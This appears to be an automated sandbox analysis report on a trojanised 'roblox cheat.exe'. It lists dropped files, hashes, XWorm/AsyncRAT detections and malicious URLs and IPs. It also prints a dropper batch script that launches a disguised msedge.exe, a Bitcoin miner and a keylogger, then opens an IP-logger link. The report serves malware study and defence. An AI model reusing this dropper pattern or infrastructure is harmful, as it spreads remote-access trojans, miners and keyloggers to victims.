                                                                                                file.exeGet hashmaliciousLummaC, DanaBot, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                                                                • 188.114.97.3
                                                                                                http://pub-5ef76d7c843349bb9d3d1a0a081c814c.r2.dev/bea40.htmlGet hashmaliciousUnknownBrowse
                                                                                                • 104.18.2.35
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                28a2c9bd18a11de089ef85a160da29e4https://kapitan.co.ke/ch/f/signin.phpGet hashmaliciousUnknownBrowse
                                                                                                • 13.85.23.86
                                                                                                • 184.28.90.27
                                                                                                http://2323.pages.dev/Get hashmaliciousUnknownBrowse
                                                                                                • 13.85.23.86
                                                                                                • 184.28.90.27
                                                                                                https://nadiperformance-f5135f.ingress-earth.ewp.live/wp-content/plugins/kredittikay%C4%B1l/pages/region.phpGet hashmaliciousUnknownBrowse
                                                                                                • 13.85.23.86
                                                                                                • 184.28.90.27
                                                                                                http://www.kjecom.com/serviciodecorreo/login/Get hashmaliciousUnknownBrowse
                                                                                                • 13.85.23.86
                                                                                                • 184.28.90.27
                                                                                                http://pub-1dce8f5133cd41708dc3ec7e6864bb58.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                • 13.85.23.86
                                                                                                • 184.28.90.27
                                                                                                http://s.id/helpcenter84619Get hashmaliciousHTMLPhisherBrowse
                                                                                                • 13.85.23.86
                                                                                                • 184.28.90.27
                                                                                                http://matmcst.gitbook.io/usGet hashmaliciousUnknownBrowse
                                                                                                • 13.85.23.86
                                                                                                • 184.28.90.27
                                                                                                http://pub-91cd24230d1a47f198e6036ff20062e7.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                • 13.85.23.86
                                                                                                • 184.28.90.27
                                                                                                http://pub-150673a82d0042c3be06302794553f66.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 13.85.23.86
                                                                                                • 184.28.90.27
                                                                                                http://connectinmate.org/@@@/cancelss/index.phpGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 13.85.23.86
                                                                                                • 184.28.90.27
                                                                                                No context
                                                                                                Process:C:\Users\user\Desktop\roblox cheat.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):522
                                                                                                Entropy (8bit):5.358731107079437
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
                                                                                                MD5:93E4C46884CB6EE7CDCC4AACE78CDFAC
                                                                                                SHA1:29B12D9409BA9AFE4C949F02F7D232233C0B5228
                                                                                                SHA-256:2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
                                                                                                SHA-512:E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
                                                                                                Malicious:true
                                                                                                Reputation:moderate, very likely benign file
                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                Process:C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe
                                                                                                File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):233235
                                                                                                Entropy (8bit):6.025218023713329
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:OhGvwW6Jj7ITWYv0yoVH283rz9WqIAsjjg4DsUQS88UP4TFf3xVOVkCC554jMN/C:M5W+j8chWf8xyvp5iIzB4CNxza/MK
                                                                                                MD5:0194EB945475F93844C0FAE769C0FA0B
                                                                                                SHA1:D72876A801C702348EA5B4B4A333C484F2A721FD
                                                                                                SHA-256:A6BC06B8255E4AFE2EEFF34684605D04DF9EC246FC201BF5E44137987189A0D3
                                                                                                SHA-512:72A00FE6B9111CAB22F1F424F815A617BE2041A3857A6265B004CA1BFD10F345CA33369CD43009B483F9436CCBCD69C70F7033A85D94527B1F39846B75B43C17
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:##..## Bundle of CA Root Certificates..##..## Certificate data from Mozilla as of: Mon Mar 11 15:25:27 2024 GMT..##..## This is a bundle of X.509 certificates of public Certificate Authorities..## (CA). These were automatically extracted from Mozilla's root certificates..## file (certdata.txt). This file can be found in the mozilla source tree:..## https://hg.mozilla.org/releases/mozilla-release/raw-file/default/security/nss/lib/ckfw/builtins/certdata.txt..##..## It contains the certificates in PEM format and therefore..## can be directly used with curl / libcurl / php_curl, or with..## an Apache+mod_ssl webserver for SSL client authentication...## Just configure this file as the SSLCACertificateFile...##..## Conversion done with mk-ca-bundle.pl version 1.29...## SHA256: 4d96bd539f4719e9ace493757afbe4a23ee8579de1c97fbebc50bba3c12e8c1e..##......GlobalSign Root CA..==================..-----BEGIN CERTIFICATE-----..MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkGA1UEBhMCQk
                                                                                                Process:C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe
                                                                                                File Type:ASCII text, with CRLF, CR line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3798
                                                                                                Entropy (8bit):5.354285454779853
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:Dqe/AZdvxDSGikir0rZv/HZgZ6ubZgZ6ub2gZ6ubhKLYZJ9K4z/SY5Jy59ZggJIt:m88/8C8yRZrvGlJMJ1JX0J2OwV7JRd/
                                                                                                MD5:F23292F5592198D1091ED092497F6A9C
                                                                                                SHA1:146EF8C465B6DE3F7AC6248C3A3C88C26CF07DBE
                                                                                                SHA-256:4A9E623032DA405BF7EB876C4DE377AC0054B85FA33800784D0AE61A269D4223
                                                                                                SHA-512:98F601B5681D28BE289C76AE5C9201E7F012E2407D4806BAA82A57C9227FEE805AA2EB1633873988909D1B631451FE5724B42515A613BE9254E1D95B480FC109
                                                                                                Malicious:false
                                                                                                Preview:2024-07-29T22:46:05.969Z..2024-07-29T22:46:05.025Z,0.025997,0f44,6,Info [FLog::DesktopInstaller] The installer reporter is initialized..2024-07-29T22:46:05.026Z,0.026046,0f44,6,Info [FLog::DesktopInstaller] Reporting Installer Start..2024-07-29T22:46:06.079Z,1.079255,07f0,6,Info [FLog::DesktopInstaller] Start the Installer thread..2024-07-29T22:46:06.122Z,1.122533,07f0,6,Info [FLog::DesktopInstaller] The installer will run InstallNormal..2024-07-29T22:46:06.122Z,1.122612,07f0,6,Info [FLog::DesktopInstaller] Fetch flag info..2024-07-29T22:46:06.929Z,1.929084,0588,6,Critical [FLog::DesktopInstaller] failed Http GET url: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper, code: 11, message: HttpError: TlsVerificationFail, body: ..2024-07-29T22:46:11.868Z,6.868474,0588,6,Critical [FLog::DesktopInstaller] failed Http GET url: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper, code: 11, message: HttpError: TlsVerificationFail, bo
                                                                                                Process:C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):166912
                                                                                                Entropy (8bit):6.251413929646261
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:TmnOFd9UhOMQRUGKXs+S++7KFSbxeY+qDDrMK:3d9YGqStKEbxI
                                                                                                MD5:D653AEF66E218FB009B43365919BBCE3
                                                                                                SHA1:D38CAFCD950B901EE79FF72EBB87FEC8B2D9582A
                                                                                                SHA-256:E85AF6A36635490B2FC2793B50C7EBC841DA95BC202A5FC9E7A4DBB17F172A2B
                                                                                                SHA-512:FF4776B44ACD815251908B7D726980FA9DE5E02AED32026C5A72B64A7B0A464399BE730EE37473FDE3406AE7D7D43284018ADE4D32FC160F579764344DA06EF6
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, Author: Joe Security
                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, Author: ditekSHen
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 76%
                                                                                                Process:C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):140288
                                                                                                Entropy (8bit):5.566968845764678
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:6mnOFd9U8OM+fe295liNgTddwY0JwsR4TbswYqkX5bEdGDOjESHhddJWjjY/ffIo:Wd9UH95D
                                                                                                MD5:3AFF3B824FC5BCD05EF4D8EEE176E443
                                                                                                SHA1:422883493E21D605CB47CC08FD48CAEAD73F414C
                                                                                                SHA-256:79750B0F34A49A75406A0D7D6949AFD83DF2B2FF946E35A94AEA6BFE1D399599
                                                                                                SHA-512:126818953B72233B2B0C50523ACE1EA8D1004F80EEDD0414A4FD3E4E385A3CB1D29E3D9BF7B50FA28AE5CC8EF2BF543D6416531F05FB977A79E60E51A82B03AE
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, Author: Joe Security
                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, Author: ditekSHen
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 76%
                                                                                                Process:C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):168960
                                                                                                Entropy (8bit):5.30703099621005
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:PV8w386j+bSL1OGtLJBz65/M6If+3Js+3JFkKeTnY:PN6bsrxBt25
                                                                                                MD5:520E97797B27B752130B3E982953CEAF
                                                                                                SHA1:AB460DA7E69D43747D98A4F45F5BB09D0E971789
                                                                                                SHA-256:8BC3BD8F0FF442D3C83DA8ED7DE13C8E44D095823E2480465BE866C08F7E8700
                                                                                                SHA-512:3219E4FE6B23411B48930FCE21DA24C8CE9BB07C6B069FA38B26B32DCC102C668F32AE816BD526CFBB44480F8279586509EBB11E9B75138A1F59AE771AA53664
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, Author: Joe Security
                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, Author: ditekSHen
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 82%
                                                                                                Process:C:\Users\user\Desktop\roblox cheat.exe
                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):630062
                                                                                                Entropy (8bit):7.130280084277062
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:yyveQB/fTHIGaPkKEYzURNAwbAgOT+t1/l36KUU0TetYsO3IB/m+:yuDXTIGaPhEYzUzA0bZB0gOY9z
                                                                                                MD5:FC411F4D9F4DBA5104CB1549153A8684
                                                                                                SHA1:A4591F154FBC922A8409A1C010DF6706F69A95E8
                                                                                                SHA-256:28A6ACCC3134DDD287CA1C37D2C136C39255EF1654475F1E4DBC511F9D0EA35D
                                                                                                SHA-512:000681D2C7A1AFA4BAA5470F6C46349B021C88F3D070BCEACBF0F2B6A6BAC6FF3F1E4F31729DB619C8E455FDF3B810662E24C446DC76F73E5C0DAD2DD6536C0B
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                Process:C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):517
                                                                                                Entropy (8bit):5.103767602316603
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:Z0DtzHGtzs22yZOVqZwGJbShOVqZwGJbKy5intuAfhH0HR:ZMz0zsBiO4Z+O4ZOKuPfQR
                                                                                                MD5:DE26F0FF06A38A22766F3978775B13BD
                                                                                                SHA1:A845EBED70BF63BD700B0AFF5418ECA6CC9177ED
                                                                                                SHA-256:8902A3F7733E13FDA8183E490550D22C8711CF30B5661CB554579C1F47A0609A
                                                                                                SHA-512:8EEE58C2312F3488EE86F50E84CB854189254753A265B7E52C564ECA5A3C0836CD059B9540DADD531EED948AEBC1F88D4B7D466780FEB8C39F7E56DDC89D22B1
                                                                                                Malicious:false
                                                                                                Preview:%echo off..copy %temp%\msedge.exe %systemDrive%\Program Files (x86)\Microsoft\Edge\Application..start %systemDrive%\Program Files (x86)\Microsoft\Edge\Application\msedge.exe..copy %temp%\BitCoin_miner.exe %userprofile%\AppData\Local\Roblox\Versions\version-2e10d35f26294ab6..start %userprofile%\AppData\Local\Roblox\Versions\version-2e10d35f26294ab6\BitCoin_miner..copy %temp%\Keyloger.exe %systemDrive%\Program Files (x86)..start %systemDrive%\Program Files (x86)\Keyloger.exe..start cmd..start https://2no.co/24RXx6
                                                                                                Process:C:\Users\user\Desktop\roblox cheat.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):5720984
                                                                                                Entropy (8bit):6.362394353465928
                                                                                                Encrypted:false
                                                                                                SSDEEP:98304:v7v3kcOmmcMxGf3Yi4bg38mky2aB173qgDDzGxSP8R7fTA7pksuq7:70cB3djgmggDaRXAtHB
                                                                                                MD5:27469372591B14FF1C57654FACB5E020
                                                                                                SHA1:492C166CD0E6C8D122CA4687659BF047CD48AFD7
                                                                                                SHA-256:3B8FCD52686095049B1563FBB6BA0BF73113A01B13C303BEBCB36D8339A1519F
                                                                                                SHA-512:0CFA845DE57ACF6F17F295F0771C2A61CD846EFDEE79DA012DEF474BCAA91D9E99D3D528CF5698E6112A310C4F97E98AE74B6CFC601B2988C51E92270EBF92A2
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:GIF image data, version 87a, 31 x 31
                                                                                                Category:dropped
                                                                                                Size (bytes):445
                                                                                                Entropy (8bit):7.051559084988302
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:tj+cYUFqb9Oq2EWxiWlb+hKI526WogYAGJe9UCZE12REqtVv6n:tqeqZF3WxiHKI5KopAMQUD10EqtVv6
                                                                                                MD5:1BD6EB140EC5E09AF54808BCE2BE74BE
                                                                                                SHA1:00746108650919B88014CE35AABF72B0F20B2046
                                                                                                SHA-256:3E13369E5C528A4598007330A7D572DADD181E268D0CF87BA7B62FD7668597F8
                                                                                                SHA-512:FA58EB9D8DB6819BCD39EC73089942D7F16CA602322E3EFA592A3418FB735A87DF9FD5388830F8E1E699CB5457234626F2B09DACEC83E265F300CE19AA907DBE
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                Category:downloaded
                                                                                                Size (bytes):2833
                                                                                                Entropy (8bit):7.876846206921263
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
                                                                                                MD5:18C023BC439B446F91BF942270882422
                                                                                                SHA1:768D59E3085976DBA252232A65A4AF562675F782
                                                                                                SHA-256:E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
                                                                                                SHA-512:A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
                                                                                                Malicious:false
                                                                                                URL:https://cdn.iplogger.org/favicon.ico
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:GIF image data, version 87a, 31 x 31
                                                                                                Category:downloaded
                                                                                                Size (bytes):445
                                                                                                Entropy (8bit):7.051559084988302
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:tj+cYUFqb9Oq2EWxiWlb+hKI526WogYAGJe9UCZE12REqtVv6n:tqeqZF3WxiHKI5KopAMQUD10EqtVv6
                                                                                                MD5:1BD6EB140EC5E09AF54808BCE2BE74BE
                                                                                                SHA1:00746108650919B88014CE35AABF72B0F20B2046
                                                                                                SHA-256:3E13369E5C528A4598007330A7D572DADD181E268D0CF87BA7B62FD7668597F8
                                                                                                SHA-512:FA58EB9D8DB6819BCD39EC73089942D7F16CA602322E3EFA592A3418FB735A87DF9FD5388830F8E1E699CB5457234626F2B09DACEC83E265F300CE19AA907DBE
                                                                                                Malicious:false
                                                                                                URL:https://counter.yadro.ru/hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.903191178197396
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                Category:dropped
                                                                                                Size (bytes):2833
                                                                                                Entropy (8bit):7.876846206921263
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
                                                                                                MD5:18C023BC439B446F91BF942270882422
                                                                                                SHA1:768D59E3085976DBA252232A65A4AF562675F782
                                                                                                SHA-256:E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
                                                                                                SHA-512:A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460), with CRLF, CR, LF line terminators
                                                                                                Category:downloaded
                                                                                                Size (bytes):9909
                                                                                                Entropy (8bit):5.403699991132508
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:DLlw+00cv13xV1cSHYu+zogDKiIIhWp6psOsW4rqSxVEGX85R2WxSi1yz:D5w+Pcv13T1FH0fWiIIm6QXxX8P20u
                                                                                                MD5:59FB7ECF472A88E923D00C5B26AA20D7
                                                                                                SHA1:02E8852C7E87CAF17459C5B0F4E0FBDCC62162AB
                                                                                                SHA-256:7BACD36CADEADF6D4482EA0ABFB9352898F07B7FFF26CF03EC751436756D66B3
                                                                                                SHA-512:820209A1BEA99D0ECAF8D6552F82BB5C5146C0F9302DCC093F2489A0DAC48C2468E5580A1D6212BEED32F9BABF1755FF7BDD146CCFD41E07BDBF6C52C64F39E9
                                                                                                Malicious:false
                                                                                                URL:https://2no.co/24RXx6
                                                                                                Preview:<!DOCTYPE html>.<html lang="US" class="html">.<head>..<title>Branded Short Domain</title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-2024" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="2no.co is a Branded Short Domain..." />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285"
                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Entropy (8bit):6.461330913623725
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.69%
                                                                                                • Win32 Executable (generic) a (10002005/4) 49.64%
                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                • InstallShield setup (43055/19) 0.21%
                                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                                File name:roblox cheat.exe
                                                                                                File size:6'410'752 bytes
                                                                                                MD5:6b94734feac8edb9f925385163ad59c9
                                                                                                SHA1:3ec9cc36f11ce7836e86089631ad790e7c8fe3cc
                                                                                                SHA256:62d6f204244bbb976a155aa7750874a56db925c8531d76dce6bf5560440cb63c
                                                                                                SHA512:ac51fd23bf17d0f6d4b4fac338d80dd50c4228e45472370b8806e0c1b00504f6c45978ccab134e3e0531d212e4c0d0222e1661c8c07c88bf1d1482047efa6ed5
                                                                                                SSDEEP:98304:d7v3kcOmmcMxGf3Yi4bg38mky2aB173qgDDzGxSP8R7fTA7pksuqbqw/:p0cB3djgmggDaRXAtHtqw/
                                                                                                TLSH:A356CE12F940C071E5D240B296BEAF76897DAD300B3898D777C41D694A316E37A3AF27
                                                                                                Icon Hash:66e2a0a0b0aa92b6
                                                                                                Entrypoint:0xa11b1e
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:false
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x66A81403 [Mon Jul 29 22:13:23 2024 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                Instruction
                                                                                                jmp dword ptr [00402000h]
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x611acc | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x614000 | 0xcc88 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x622000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x612000 | 0x1c | .sdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x60fb24 | 0x60fc00 | 935fc6ce3cd3ebf8fbc30adc805334f8 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.sdata | 0x612000 | 0x138 | 0x200 | 2b09539ff4c51eb230bd835080b63517 | False | 0.279296875 | data | 2.11838246956095 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x614000 | 0xcc88 | 0xce00 | 0be98fb8efcbbfdb03fefe23184dff85 | False | 0.17957372572815533 | data | 4.313831842937731 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x622000 | 0xc | 0x200 | 3c75d8bdac0c06768297755f0689be06 | False | 0.044921875 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "a" | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x6144c8 | 0xeeb | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.8866195339094004
RT_ICON | 0x6153b8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 0 | | | 0.061230514879546526
RT_ICON | 0x6195e0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.09139004149377593
RT_ICON | 0x61bb88 | 0x1a68 | Device independent bitmap graphic, 40 x 80 x 32, image size 0 | | | 0.11553254437869823
RT_ICON | 0x61d5f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.1376641651031895
RT_ICON | 0x61e698 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | | | 0.1918032786885246
RT_ICON | 0x61f020 | 0x6b8 | Device independent bitmap graphic, 20 x 40 x 32, image size 0 | | | 0.2779069767441861
RT_ICON | 0x61f6d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.30939716312056736
RT_GROUP_ICON | 0x61fb40 | 0x76 | data | | | 0.7457627118644068
RT_VERSION | 0x614280 | 0x244 | data | | | 0.46551724137931033
RT_MANIFEST | 0x61fbb8 | 0x10d0 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text | | | 0.40892193308550184

DLL | Import
mscoree.dll | _CorExeMain

Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-30T00:47:04.044403+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49743 | 13.85.23.86 | 192.168.2.7
2024-07-30T00:46:25.027588+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49729 | 13.85.23.86 | 192.168.2.7

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                Jul 30, 2024 00:46:20.822439909 CEST44349719172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:20.863298893 CEST49719443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:20.944083929 CEST49723443192.168.2.718.239.18.53
                                                                                                Jul 30, 2024 00:46:20.944120884 CEST4434972318.239.18.53192.168.2.7
                                                                                                Jul 30, 2024 00:46:20.944273949 CEST49723443192.168.2.718.239.18.53
